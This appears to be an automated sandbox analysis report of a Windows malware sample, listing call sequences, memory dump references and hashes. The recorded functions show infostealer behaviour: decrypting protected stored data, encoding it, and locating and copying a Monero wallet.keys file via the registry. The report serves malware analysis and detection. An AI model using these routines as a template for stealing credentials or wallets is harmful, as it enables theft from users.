                                                      • Opcode ID: 409e78fb13d6794445940b5c0aff07b763ad56f8c0cd95c9c67de4eede8e8ce7
                                                      • Instruction ID: d7931f8766cca64d36228eaf74a94c2a2b9d6a35022efedcabe76ebec8797756
                                                      • Opcode Fuzzy Hash: 409e78fb13d6794445940b5c0aff07b763ad56f8c0cd95c9c67de4eede8e8ce7
                                                      • Instruction Fuzzy Hash: F9011E75B40318BBEB14DBA49C4AFAA7779EB44B55F104159FA09EB2C0D6B0A9008BE4
                                                      APIs
                                                      • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 004240AD
                                                      • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 004240BC
                                                      • HeapAlloc.KERNEL32(00000000,?,?,?), ref: 004240C3
                                                      • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 004240F3
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: BinaryCryptHeapString$AllocProcess
                                                      • String ID:
                                                      • API String ID: 3939037734-0
                                                      • Opcode ID: 1654423fd72de82e54ce634d70b22f0d0a00e139ff6f7135eda8dce405f6aeb9
                                                      • Instruction ID: d2b09a1c624c39b133de08918eaa2f92ad29e846d2d732d6bc326f324e173560
                                                      • Opcode Fuzzy Hash: 1654423fd72de82e54ce634d70b22f0d0a00e139ff6f7135eda8dce405f6aeb9
                                                      • Instruction Fuzzy Hash: B0011E70600215ABDB149FA5EC85BAB7BADEF85711F108059BE0987340DA7199408BA4
                                                      APIs
                                                      • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 009F4314
                                                      • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 009F4323
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 009F432A
                                                      • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 009F435A
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: BinaryCryptHeapString$AllocateProcess
                                                      • String ID:
                                                      • API String ID: 3825993179-0
                                                      • Opcode ID: 1654423fd72de82e54ce634d70b22f0d0a00e139ff6f7135eda8dce405f6aeb9
                                                      • Instruction ID: cf10160015ac8444c6c398940c9ed81a45aa2a038903c7f269945b312243fb23
                                                      • Opcode Fuzzy Hash: 1654423fd72de82e54ce634d70b22f0d0a00e139ff6f7135eda8dce405f6aeb9
                                                      • Instruction Fuzzy Hash: 6F011A70600209ABDB149FA5EC89AABBBADEF85315F104159BE0987240DBB1E9408BA0
                                                      APIs
                                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409BFF
                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00409C13
                                                      • memcpy.MSVCRT(00000000,?), ref: 00409C2A
                                                      • LocalFree.KERNEL32(?), ref: 00409C37
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                                      • String ID:
                                                      • API String ID: 3243516280-0
                                                      • Opcode ID: d6986c5c4f938f64ac158f86dd5ebf18f182eae35123fd4b82889631517280d4
                                                      • Instruction ID: abf8395257343a8b015b9f0b6c8a158c8b551f0c270fe32e84b7b64ff486a2c6
                                                      • Opcode Fuzzy Hash: d6986c5c4f938f64ac158f86dd5ebf18f182eae35123fd4b82889631517280d4
                                                      • Instruction Fuzzy Hash: F701FB75E41309ABE7109BA4DC45BAAB779EB44700F504169FA04AB380DBB09E008BE4
                                                      APIs
                                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 009D9E66
                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 009D9E7A
                                                      • memcpy.MSVCRT(00000000,?), ref: 009D9E91
                                                      • LocalFree.KERNEL32(?), ref: 009D9E9E
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                                      • String ID:
                                                      • API String ID: 3243516280-0
                                                      • Opcode ID: d6986c5c4f938f64ac158f86dd5ebf18f182eae35123fd4b82889631517280d4
                                                      • Instruction ID: 8eb31d563c4e72e187ca42784d00cd9b6451baf9d59eea1f33169532de9558c7
                                                      • Opcode Fuzzy Hash: d6986c5c4f938f64ac158f86dd5ebf18f182eae35123fd4b82889631517280d4
                                                      • Instruction Fuzzy Hash: CC01FB75A41305ABD710DFA4DC55BAEB779EB44700F108559FA04AB380DBB09A008BE4
                                                      APIs
                                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00409B9B
                                                      • LocalAlloc.KERNEL32(00000040,00000000,?,00000000,00000001,00000000,?,00000000,00000000), ref: 00409BAA
                                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00409BC1
                                                      • LocalFree.KERNEL32(?,?,00000000,00000001,00000000,?,00000000,00000000,?,00000000,00000001,00000000,?,00000000,00000000), ref: 00409BD0
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: BinaryCryptLocalString$AllocFree
                                                      • String ID:
                                                      • API String ID: 4291131564-0
                                                      • Opcode ID: 52a740a2c3a0b915a6e879fc1adc512548ca54352df63306b7731fa0a6cd477b
                                                      • Instruction ID: f56e211861b801462745ebf168d915f74eb1128f2766c7b67ff98b51cc3af22d
                                                      • Opcode Fuzzy Hash: 52a740a2c3a0b915a6e879fc1adc512548ca54352df63306b7731fa0a6cd477b
                                                      • Instruction Fuzzy Hash: 31F0BD703453126BE7305F65AC49F577BA9EB04B61F240415FA49EA2C0E7B49C40CAA4
                                                      APIs
                                                      • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 009D9E02
                                                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 009D9E11
                                                      • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 009D9E28
                                                      • LocalFree.KERNEL32 ref: 009D9E37
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: BinaryCryptLocalString$AllocFree
                                                      • String ID:
                                                      • API String ID: 4291131564-0
                                                      • Opcode ID: 52a740a2c3a0b915a6e879fc1adc512548ca54352df63306b7731fa0a6cd477b
                                                      • Instruction ID: dfc56f348da57e2d5cd131a2aa06f22009cc6f18560f869e466698851dfd8d59
                                                      • Opcode Fuzzy Hash: 52a740a2c3a0b915a6e879fc1adc512548ca54352df63306b7731fa0a6cd477b
                                                      • Instruction Fuzzy Hash: 50F0BD703843126BE7705F65AC49F567BADEB04B51F241415FA49EA2C0E7F4D840CAB4
                                                      APIs
                                                      • CoCreateInstance.COMBASE(0042B140,00000000,00000001,0042B130,?), ref: 009ECE6D
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 009ECEAD
                                                      • lstrcpyn.KERNEL32(?,?,00000104), ref: 009ECF30
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                                                      • String ID:
                                                      • API String ID: 1940255200-0
                                                      • Opcode ID: 5bf1d04cd0d9c23ec7e4ee8b214c7d0ff5809634d7edf7c662a8ddbc22321378
                                                      • Instruction ID: a5ee95fc1335b8c9d45281f4dd24cc4f60536b8a9f46ea23a0935dc81fa7a32c
                                                      • Opcode Fuzzy Hash: 5bf1d04cd0d9c23ec7e4ee8b214c7d0ff5809634d7edf7c662a8ddbc22321378
                                                      • Instruction Fuzzy Hash: C1315471A40629BFD710DB98CC81FA9B7B9AB88B10F504184B604EB2D0D7B0AE45CB90
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0e1adde497a2ca43af4bba02631a3623e84c378fdb31264d7b34468534bc655b
                                                      • Instruction ID: 9660e86c1ed5afd44426f2be66ec33fa0469d61a4d3bbdbaf7e5065811ac15bb
                                                      • Opcode Fuzzy Hash: 0e1adde497a2ca43af4bba02631a3623e84c378fdb31264d7b34468534bc655b
                                                      • Instruction Fuzzy Hash: 43119132B042289FCB20CF9CE8909B9B3F9EB8971470501AAEA45D7751DB30ED51CB90
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: free
                                                      • String ID:
                                                      • API String ID: 1294909896-0
                                                      • Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                                      • Instruction ID: cd1e51a738305e631eabf60075f1c49b31eccda9252490eafa472988c6d9787f
                                                      • Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                                      • Instruction Fuzzy Hash: 4671F731414B0C9BD7E33BB1DD03B6AFAA27F84301F104915B3DA225B69E32E965BB51
                                                      APIs
                                                      • lstrcpy.KERNEL32(?), ref: 009E89A3
                                                        • Part of subcall function 009F4287: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 009F42B4
                                                        • Part of subcall function 009F4287: lstrcpy.KERNEL32(00000000,?), ref: 009F42E9
                                                      • StrStrA.SHLWAPI(?,00638C08), ref: 009E89C8
                                                      • lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 009E89E7
                                                      • lstrlen.KERNEL32(?), ref: 009E89FA
                                                      • wsprintfA.USER32 ref: 009E8A0A
                                                      • lstrcpy.KERNEL32(?,?), ref: 009E8A20
                                                      • StrStrA.SHLWAPI(?,00638C94), ref: 009E8A4D
                                                      • lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 009E8A74
                                                      • lstrlen.KERNEL32(?), ref: 009E8A87
                                                      • wsprintfA.USER32 ref: 009E8A97
                                                      • lstrcpy.KERNEL32(?,006393D0), ref: 009E8AAD
                                                      • StrStrA.SHLWAPI(?,00638C5C), ref: 009E8ADA
                                                      • lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 009E8AF9
                                                      • lstrlen.KERNEL32(?), ref: 009E8B0C
                                                      • wsprintfA.USER32 ref: 009E8B1C
                                                      • lstrcpy.KERNEL32(?,?), ref: 009E8B32
                                                      • StrStrA.SHLWAPI(?,00638ABC), ref: 009E8B5F
                                                      • lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 009E8B7E
                                                      • lstrlen.KERNEL32(?), ref: 009E8B91
                                                      • wsprintfA.USER32 ref: 009E8BA1
                                                      • lstrcpy.KERNEL32(?,?), ref: 009E8BB7
                                                      • StrStrA.SHLWAPI(?,00638AD0), ref: 009E8BE4
                                                      • lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 009E8C0B
                                                      • lstrlen.KERNEL32(?), ref: 009E8C1E
                                                      • wsprintfA.USER32 ref: 009E8C2E
                                                      • lstrcpy.KERNEL32(?,006393D0), ref: 009E8C44
                                                      • StrStrA.SHLWAPI(?,0063891C), ref: 009E8C71
                                                      • lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 009E8C90
                                                      • lstrlen.KERNEL32(?), ref: 009E8CA3
                                                      • wsprintfA.USER32 ref: 009E8CB3
                                                      • lstrcpy.KERNEL32(?,?), ref: 009E8CC9
                                                      • StrStrA.SHLWAPI(?,00638D3C), ref: 009E8CF6
                                                      • lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 009E8D15
                                                      • lstrlen.KERNEL32(?), ref: 009E8D28
                                                      • wsprintfA.USER32 ref: 009E8D38
                                                      • lstrcpy.KERNEL32(?,?), ref: 009E8D4E
                                                      • StrStrA.SHLWAPI(?,00638B34), ref: 009E8D7B
                                                      • lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 009E8DA2
                                                      • lstrlen.KERNEL32(?), ref: 009E8DB5
                                                      • wsprintfA.USER32 ref: 009E8DC5
                                                      • lstrcpy.KERNEL32(?,006393D0), ref: 009E8DDB
                                                      • lstrlen.KERNEL32(?), ref: 009E8E00
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009E8E35
                                                      • strtok_s.MSVCRT ref: 009E8F12
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrlen$lstrcpynwsprintf$FolderPathstrtok_s
                                                      • String ID:
                                                      • API String ID: 2042561329-0
                                                      • Opcode ID: 0e757f730b442b6b043138a9859d54580db3b09a1fb68e8a6a4e1378d116aa89
                                                      • Instruction ID: 9cd70ae70a5f979e481ab00eaeaf8240fb7367c5e515182016dca0095e6fb682
                                                      • Opcode Fuzzy Hash: 0e757f730b442b6b043138a9859d54580db3b09a1fb68e8a6a4e1378d116aa89
                                                      • Instruction Fuzzy Hash: 35E150B1904654AFDB10DFA4DD48AEA77BAEF98300F104599F909E3350DBB4AE01CFA1
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009D2106
                                                      • lstrlen.KERNEL32(006389F0), ref: 009D2115
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009D2142
                                                      • lstrcat.KERNEL32(00000000,?), ref: 009D214A
                                                      • lstrlen.KERNEL32(00431D64), ref: 009D2155
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009D2175
                                                      • lstrcat.KERNEL32(00000000,00431D64), ref: 009D2181
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009D21A9
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 009D21B4
                                                      • lstrlen.KERNEL32(00431D64), ref: 009D21BF
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009D21DC
                                                      • lstrcat.KERNEL32(00000000,00431D64), ref: 009D21E8
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009D2213
                                                      • lstrlen.KERNEL32(?), ref: 009D224B
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009D226B
                                                      • lstrcat.KERNEL32(00000000,?), ref: 009D2279
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009D22A0
                                                      • lstrlen.KERNEL32(00431D64), ref: 009D22B2
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009D22D2
                                                      • lstrcat.KERNEL32(00000000,00431D64), ref: 009D22DE
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009D2304
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 009D230F
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009D233B
                                                      • lstrlen.KERNEL32(?), ref: 009D2351
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009D2371
                                                      • lstrcat.KERNEL32(00000000,?), ref: 009D237F
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009D23A9
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009D23E6
                                                      • lstrlen.KERNEL32(00638CA4), ref: 009D23F4
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009D2418
                                                      • lstrcat.KERNEL32(00000000,00638CA4), ref: 009D2420
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009D245E
                                                      • lstrcat.KERNEL32(00000000), ref: 009D246B
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009D2494
                                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 009D24BD
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009D24E9
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009D2526
                                                      • DeleteFileA.KERNEL32(00000000), ref: 009D255E
                                                      • FindNextFileA.KERNEL32(00000000,?), ref: 009D25AB
                                                      • FindClose.KERNEL32(00000000), ref: 009D25BA
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                                                      • String ID:
                                                      • API String ID: 2857443207-0
                                                      • Opcode ID: d5fdf3581800270d76cd737130c6eb2ed7cec78ee1207b2e831536629e65eb1a
                                                      • Instruction ID: 4258e5db47c24e3defd6d7d9890d1852bfaea2558f8c173b06232610e380ffb9
                                                      • Opcode Fuzzy Hash: d5fdf3581800270d76cd737130c6eb2ed7cec78ee1207b2e831536629e65eb1a
                                                      • Instruction Fuzzy Hash: FEE15071A412569BCB20EF74CC85BAE7BBAEF95304F048466F805A7361DB78DD01DBA0
                                                      APIs
                                                      • memset.MSVCRT ref: 0040108A
                                                        • Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00401015
                                                        • Part of subcall function 00401000: HeapAlloc.KERNEL32(00000000), ref: 0040101C
                                                        • Part of subcall function 00401000: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00401039
                                                        • Part of subcall function 00401000: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401053
                                                        • Part of subcall function 00401000: RegCloseKey.ADVAPI32(?), ref: 0040105D
                                                      • lstrcatA.KERNEL32(?,00000000), ref: 004010A0
                                                      • lstrlenA.KERNEL32(?), ref: 004010AD
                                                      • lstrcatA.KERNEL32(?,.keys), ref: 004010C8
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 004010FF
                                                      • lstrlenA.KERNEL32(00A76890), ref: 0040110D
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 00401131
                                                      • lstrcatA.KERNEL32(00000000,00A76890), ref: 00401139
                                                      • lstrlenA.KERNEL32(\Monero\wallet.keys), ref: 00401144
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 00401168
                                                      • lstrcatA.KERNEL32(00000000,\Monero\wallet.keys), ref: 00401174
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 0040119A
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 004011DF
                                                      • lstrlenA.KERNEL32(00A7E158), ref: 004011EE
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 00401215
                                                      • lstrcatA.KERNEL32(00000000,?), ref: 0040121D
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 00401258
                                                      • lstrcatA.KERNEL32(00000000), ref: 00401265
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 0040128C
                                                      • CopyFileA.KERNEL32(?,?,00000001), ref: 004012B5
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 004012E1
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 0040131D
                                                        • Part of subcall function 0041EF30: lstrcpy.KERNEL32(00000000,?), ref: 0041EF62
                                                      • DeleteFileA.KERNEL32(?), ref: 00401351
                                                      • memset.MSVCRT ref: 0040136E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$lstrlen$FileHeapmemset$AllocCloseCopyDeleteOpenProcessQueryValue
                                                      • String ID: .keys$\Monero\wallet.keys
                                                      • API String ID: 2734118222-3586502688
                                                      • Opcode ID: 9eda4a6cc88766a33cd02c84d7baa0a0e4ec5d0bc14cb39f866b325505556883
                                                      • Instruction ID: 95442954b0c09f74f01b2627741839e7c598bf71559ee3eba0e7726b6ccc06b1
                                                      • Opcode Fuzzy Hash: 9eda4a6cc88766a33cd02c84d7baa0a0e4ec5d0bc14cb39f866b325505556883
